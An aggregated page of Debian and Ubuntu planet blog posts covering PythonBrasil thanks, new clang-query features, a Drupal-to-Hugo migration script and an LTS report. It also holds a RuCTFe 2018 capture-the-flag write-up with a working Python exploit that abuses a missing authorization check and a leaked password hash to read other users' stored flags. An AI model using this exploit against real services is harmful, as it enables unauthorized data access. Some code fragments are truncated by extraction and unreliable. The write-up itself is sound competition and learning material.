And, of course, to finish this post I ought to mention the beach... On my last two days in Natal, I was gifted with the awesomeness that it is the ocean at Ponta Negra during the full moon. There are no words to describe the beauty of it (I am sorry I couldn't take a good picture of it).

Thank you notes

I know this post ended up being extensive, but how can one summarize an experience with an event as huge as PythonBrasil? It's hard. I think it's safe to say that to be part of something like that has a lasting impact in my life. All the technical content I have heard about gives me motivation to keep studying and learning new things. All the people I have met, friends old and new, give meaning to the work to make the Python community more open and inclusive.

So, I cannot thank Outreachy enough for making my participation in Python Brasil possible!

This whole journey would not be possible without the awesome people below, so I would like to also thank:

  • My Outreachy mentors Daniel Pocock and Bruno for the support during the internship and beyond
  • Flavio Juvenal for the feedback on my proposal and giving the golden tip about Pandas
  • Andreza Rocha for not letting me give up on my dream to go to this PythonBrasil
  • Felipe de Morais and Betina Costa for sitting in the very front row and nodding when I was unsure during my talk
  • Elias Dorneles for the support when applying to Outreachy and for reviewing my slides
  • PyLadies Brazil for being the safety net so many women can rely on
Renata Renata's blog

Stephen Kelly: Future Developments in clang-query

Planet Ubuntu - Dje, 11/11/2018 - 11:46md
Getting started – clang-tidy AST Matchers

Over the last few weeks I published some blogs on the Visual C++ blog about Clang AST Matchers. The series can be found here:

I am not aware of any similar series existing which covers creation of clang-tidy checks, and use of clang-query to inspect the Clang AST and assist in the construction of AST Matcher expressions. I hope the series is useful to anyone attempting to write clang-tidy checks. Several people have reported to me that they have previously tried and failed to create clang-tidy extensions, due to various issues, including lack of information tying it all together.

Other issues with clang-tidy include the fact that it relies on the “mental model” a compiler has of C++ source code, which might differ from the “mental model” of regular C++ developers. The compiler needs to have a very exact representation of the code, and needs to have a consistent design for the class hierarchy representing each standard-required feature. This leads to many classes and class hierarchies, and a difficulty in discovering what is relevant to a particular problem to be solved.

I noted several problems in those blog posts, namely:

  • clang-query does not show AST dumps and diagnostics at the same time<
  • Code completion does not work with clang-query on Windows
  • AST Matchers which are appropriate to use in contexts are difficult to discover
  • There is no tooling available to assist in discovery of source locations of AST nodes

Last week at code::dive in Wroclaw, I demonstrated tooling solutions to all of these problems. I look forward to video of that talk (and videos from the rest of the conference!) becoming available.

Meanwhile, I’ll publish some blog posts here showing the same new features in clang-query and clang-tidy.

clang-query in Compiler Explorer

Recent work by the Compiler Explorer maintainers adds the possibility to use source code tooling with the website. The compiler explorer contains new entries in a menu to enable a clang-tidy pane.

clang-tidy in Compiler Explorer

I demonstrated use of compiler explorer to use the clang-query tool at the code::dive conference, building upon the recent work by the compiler explorer developers. This feature will get upstream in time, but can be used with my own AWS instance for now. This is suitable for exploration of the effect that changing source code has on match results, and orthogonally, the effect that changing the AST Matcher has on the match results. It is also accessible via

It is important to remember that Compiler Explorer is running clang-query in script mode, so it can process multiple let and match calls for example. The new command set print-matcher true helps distinguish the output from the matcher which causes the output. The help command is also available with listing of the new features.

The issue of clang-query not printing both diagnostic information and AST information at the same time means that users of the tool need to alternate between writing

set output diag


set output dump

to access the different content. Recently, I committed a change to make it possible to enable both output and diag output from clang-query at the same time. New commands follow the same structure as the set output command:

enable output dump disable output dump

The set output <feature> command remains as an “exclusive” setting to enable only one output feature and disable all others.

Dumping possible AST Matchers

This command design also enables the possibility of extending the features which clang-query can output. Up to now, developers of clang-tidy extensions had to inspect the AST corresponding to their source code using clang-query and then use that understanding of the AST to create an AST Matcher expression.

That mapping to and from the AST “mental model” is not necessary. New features I am in the process of upstreaming to clang-query enable the output of AST Matchers which may be used with existing bound AST nodes. The command

enable output matcher

causes clang-query to print out all matcher expressions which can be combined with the bound node. This cuts out the requirement to dump the AST in such cases.

Inspecting the AST is still useful as a technique to discover possible AST Matchers and how they correspond to source code. For example if the functionDecl() matcher is already known and understood, it can be dumped to see that function calls are represented by the CallExpr in the Clang AST. Using the callExpr() AST Matcher and dumping possible matchers to use with it leads to the discovery that callee(functionDecl()) can be used to determine particulars of the function being called. Such discoveries are not possible by only reading AST output of clang-query.

Dumping possible Source Locations

The other important discovery space in creation of clang-tidy extensions is that of Source Locations and Source Ranges. Developers creating extensions must currently rely on the documentation of the Clang AST to discover available source locations which might be relevant. Usually though, developers have the opposite problem. They have source code, and they want to know how to access a source location from the AST node which corresponds semantically to that line and column in the source.

It is important to make use a semantically relevant source location in order to make reliable tools which refactor at scale and without human intervention. For example, a cursory inspection of the locations available from a FunctionDecl AST node might lead to the belief that the return type is available at the getBeginLoc() of the node.

However, this is immediately challenged by the C++11 trailing return type feature, where the actual return type is located at the end. For a semanticallly correct location, you must currently use


It should be possible to use getReturnTypeSourceRange(), but a bug in clang prevents that as it does not appreciate the trailing return types feature.

Once again, my new output feature of clang-query presents a solution to this discovery problem. The command

enable output srcloc

causes clang-query to output the source locations by accessor and caret corresponding to the source code for each of the bound nodes. By inspecting that output, developers of clang-tidy extensions can discover the correct expression (usually via the clang::TypeLoc heirarchy) corresponding to the source code location they are interested in refactoring.

Next Steps

I have made many more modifications to clang-query which I am in the process of upstreaming. My Compiler explorer instance is listed as the ‘clang-query-future’ tool, while the clang-query-trunk tool runs the current trunk version of clang-query. Both can be enabled for side-by-side comparison of the future clang-query with the exising one.

RuCTFe 2018 laberator

Planet Debian - Dje, 11/11/2018 - 4:33md

Crew: izibi, siccegge
CTF: RuCTFe 2018

The service

Webservice written in go. Has some pretty standard functionality (register, login, store a string) with the logic somewhat dispersed between the main webserver in main.go, some stuff in the templates and the websockets endpoint in command_executor.go. Obviously you have to extract the strings ("labels") from the gameserver. Also the phrase stored when creating the account was used to store some more flags.

Client side authentication for labels

Gem from the viewLabel javascript function. For some reason the label's owner is checked client-side after the data was already returned to the client.

let label = JSON.parse(; if (label.Owner !== getLoginFromCookies()) { return; }

And indeed, the websocket view method checks for some valid session but doesn't concern itself with any further validation of access priviledges. As long as you have any valid session and can figure out websockets you can get about any label you like.

"view": func(ex *CommandExecutor, data []byte) ([]byte, error) { var viewData ViewData err := json.Unmarshal(data, &viewData) if err != nil { return nil, createUnmarshallingError(err, data) } cookies := parseCookies(viewData.RawCookies) ok, _ := if !ok { return nil, errors.New("invalid session") } label, err := ex.dbApi.ViewLabel(viewData.LabelId) if err != nil { return nil, errors.New(fmt.Sprintf("db request error: %v, labelId=(%v)", err.Error(), viewData.LabelId)) } rawLabel, err := json.Marshal(*label) if err != nil { return nil, errors.New(fmt.Sprintf("marshalling error: %v, label=(%v)", err.Error(), *label)) } return rawLabel, nil },

Putting things together. The exploit builds an fresh account. It generates some label (to figure out the ID if the most recent labels) and then bulk loads the last 100 labels

#!/usr/bin/env python3 import requests import websocket import json import sys import string import random import base64 def main(): host = sys.argv[1] session = requests.session() password = [i for i in string.ascii_letters] random.shuffle(password) username = ''.join(password[:10]) phrase = base64.b64encode((''.join(password[10:20])).encode()).decode() password = base64.b64encode((''.join(password[20:36])).encode()).decode() x = session.get('http://%s:8888/register?login=%s&phrase=%s&password=%s' % (host,username,phrase,password)) x = session.get('http://%s:8888/login?login=%s&password=%s' % (host,username, password)) raw_cookie = 'login=%s;sid=%s' % (x.cookies['login'], x.cookies['sid']) ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,)) data = {'Text': 'test', 'Font': 'Arial', 'Size': 20, 'RawCookies': raw_cookie} ws.send(json.dumps({"Command": "create", "Data": json.dumps(data)})) # make sure create is already commited before continuing ws.recv() data = {'Offset': 0, 'RawCookies': raw_cookie} ws.send(json.dumps({"Command": "list", "Data": json.dumps(data)})) stuff = json.loads(ws.recv()) lastid = stuff[0]['ID'] for i in range(0 if lastid-100 < 0 else lastid-100, lastid): ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,)) try: data = {'LabelId': i, 'RawCookies': raw_cookie} ws.send(json.dumps({"Command": "view", "Data": json.dumps(data)})) print(json.loads(ws.recv())["Text"]) except Exception: pass if __name__ == '__main__': main() Password Hash

The hash module used is obviously suspect. consists of a binary and a wrapper, freshly uploaded to github just the day before. Also if you create a test account with an short password (say, test) you end up with an hash that contains the password in plain (say, testTi\x02mH\x91\x96U\\I\x8a\xdd). Looking closer, if you register with a password that is exactly 16 characters (aaaaaaaaaaaaaaaa) you end up with an 16 character hash that is identical. This also means the password hash is a valid password for the account.

Listening to tcpdump for a while you'll notice interesting entries:


See the password hash there? Turns out this comes from the regularly scheduled last_users websocket call.

"last_users": func(ex *CommandExecutor, _ []byte) ([]byte, error) { users := ex.dbApi.GetLastUsers() rawUsers, err := json.Marshal(*users) if err != nil { return nil, errors.New(fmt.Sprintf("marshalling error: %v, users=(%v)", err.Error(), *users)) } return rawUsers, nil },

So call last_users (doesn't even need a session), for all the last 20 users log in and just load all the labels. Good thing passwords are transfered base64 encoded, so no worrying about non-printable characters in the password hash.

Additionally sessions were generated with the broken hash implementation. This probably would have allowed to compute session ids.

Christoph Egger Christoph's last Weblog entries

Migrating from Drupal to Hugo

Planet Debian - Dje, 11/11/2018 - 12:30md
TL;DR: Migrating my website from Drupal 7 to Hugo

Jump directly to the end titled Migration to Hugo

Initial website

Looking back at my website’s history, the domain was first registered sometime in 2003. Back then, it was mostly a couple of html pages. Being (and still) a novice in web, my website was mostly on ideas from others. IIRC, for the bare html one, I took a lot of look wise details from Miss Garrels’ website.

First blog

My initial blog was self-hosted with a blogging software in PHP, named PivotX The website for it still works, so hopefully the project is still alive. It was pretty good a tool for the purpose. Very lean and had support for data backends in both, MySQL and flat files. The latter was important to me as I wanted to keep it simple.


My first interaction with Drupal was with its WSOD. That was it until I revisited it when evaluating different FOSS web tools to build a community site for one of my previous employer.

Back then, we tried multiple tools: Jive, Joomla, Wordpress and many more. But finally, resorted to Drupal. What the requirement was was to have something which would filter content under nested categories. Then, of the many things tried, the only one which seemed to be able to do it was Drupal with its Taxonomy feature, along with a couple of community driven add-on modules.

We built it but there were other challenges. It was hard to find people who were good with Drupal. I remember to have interviewed around 10-15 people, who could take over the web portal and maintain it, and still not able to fill the position. Eventually, I ended up maintaining the portal by myself.

Migrating my website to Drupal

The easiest way to deal with the maintenance was to have one more live portal running Drupal. My website, which back then, had ambitious goals to also serve an online shopping cart, was the perfect candidate. So I migrated my website from PivotX to Drupal 6. Drupal had a nice RSS Import module which was able to pull in most of the content, except the comments on each article. I think that is more a limitation of RSS Feeds. But the only data import path I could find back then was to import content through RSS Feeds.

Initially, Drupal looked like a nice tool. Lots of features and a vibrant community made it very appealing. And I always desired to build some skills Hands-On (that’s how the job market likes it; irrespective of the skills, it is the hands-on that they evaluate) by using Drupal both, at the employer’s community portal and my personal website.

Little did I know that running/maintaining a website is one aspect; where as extending it, is another (mostly expensive) affair.

Drupal 7

That was the first blow. For a project serving as a platform, Drupal was a PITA when dealing with migrations. And it is not about migrations to a different platform. Rather an upgrade from one major release to another.

Having been using Debian for quite some time, this approach from Drupal brought back memories from the past, of when using Red Hat Linux and SuSE Linux distribution; where upgrades were not a common term, and every major release of the distribution people were mostly recommended to re-install.

Similar was the case with Drupal. Every major release, many (core) modules would be dropped. Many add-on modules would lose support. Neither the project nor the community around it, was helpful anymore.

But somehow, I eventually upgraded to Drupal 7. I did lose a lot of functionality. My nested taxonomy was gone and my themes were all broken. For the web novice that I am, it took me some time to fix those issues.

But the tipping point came in with Drupal 8. It took the pain to the next level repeating the same process of dropping modules and breaking functionalities; never did I hear much of backward compatibility on this platform.


For quite some time I kept looking for a migration path away from Drupal 7. I did not care what it was as long as it was FOSS, and had an active community around it. The immediate first choice was WordPress. By this time, my web requirements had trimmed down. No more did I have outrageous ideas of building all solutions (Web, Blog, Cart) in a single platform. All I did was mostly blog and had a couple of basic pages.

The biggest problem was migration. WP has a module, that does migration. But, for whatever annoying reason, the free version of it would only pick 7 articles from the total. And it did not import comments. So the annoyance and my limitations with web technologies was still prone to with WP. This migration path did not enthuse me much: it was more like a Hindi idiom: आसमान से गिरे और खजूर में अटके

I also attempted Jekyll and Hugo. My limited initial attempts were disappointing. Jekyll had an import module, which IIRC did not work proper. Similar was the case with Hugo, which has a module listed on its migration page, drupal2hugo, which sets a disappointment in the beginning itself.

With nothing much left, I just kept postponing my (desperate) plans to migrate.

Migration to Hugo

Luckily, I was able to find some kind soul share migration scripts to help migrate from Drupal 7 to Hugo. Not everything could be migrated (I had to let go of comments) but not much was I in a position to wait more.

With very minimal changes to adapt it to my particular setup, I was able to migrate most of my content. Now, my website is running on markdown generated with Hugo. More than the tool, I am happy to have the data available in a much standard format.

If there’s one thing that I’m missing on my website, it is mostly the commenting system. I would love to have a simple way to accept user comments integrated into Hugo itself, which would just append those comments to their respective posts. Hopefully soon, when I have (some more) free time.

<?php define('DRUPAL_ROOT', __DIR__); include_once(DRUPAL_ROOT . '/includes/'); drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL); $nids = db_query('SELECT DISTINCT(nid) FROM {node}') ->fetchCol(); $nodes = node_load_multiple($nids); foreach($nodes as $node) { $front_matter = array( 'title' => $node->title, 'date' => date('c', $node->created), 'lastmod' => date('c', $node->changed), 'draft' => 'false', ); if (count($node->taxonomy_vocabulary_2[LANGUAGE_NONE])) { $tags = taxonomy_term_load_multiple( array_column( $node->taxonomy_vocabulary_2[LANGUAGE_NONE], 'tid' ) ); $front_matter['tags'] = array_column($tags, 'name'); } if (count($node->taxonomy_vocabulary_1[LANGUAGE_NONE])) { $cat = taxonomy_term_load_multiple( array_column( $node->taxonomy_vocabulary_1[LANGUAGE_NONE], 'tid' ) ); $front_matter['categories'] = array_column($cat, 'name'); } $path = drupal_get_path_alias('node/'.$node->nid); if ($path != 'node/'.$node->nid) { $front_matter['url'] = '/'.$path; $content_dir = explode('/', $path); $content_dir = end($content_dir); } else { $content_dir = $node->nid; } $content = json_encode( $front_matter, JSON_PRETTY_PRINT|JSON_UNESCAPED_SLASHES|JSON_UNESCAPED_UNICODE ); $content .= "\n\n"; $tmp_file = '/tmp/node.html'; file_put_contents($tmp_file, $node->body['fr'][0]['value']); $body = shell_exec('html2markdown '.$tmp_file); unlink($tmp_file); //$body = $node->body['fr'][0]['value']; $content .= $body; $dir_name = '/tmp/hugo/content/'.$node->type.'/'.$content_dir; mkdir($dir_name, 0777, true); file_put_contents($dir_name.'/', $content); }

Ritesh Raj Sarraf Debian Blog on RESEARCHUT


Planet Debian - Sht, 10/11/2018 - 9:47md
My LTS work in October

In October 2018 sadly I just managed to spend 1h working on jessie LTS on:

Today while writing this I also noticed that currently misses DLAs 1532 until DLA 1541, which I have just reported to the #debian-lists IRC channel and as #913426. Update: as that bug was closed quickly, I guess instead we need to focus on #859123 and #859122, so that DLAs are accessable to everyone in future.

Holger Levsen Any sufficiently advanced thinking is indistinguishable from madness


Subscribe to AlbLinux agreguesi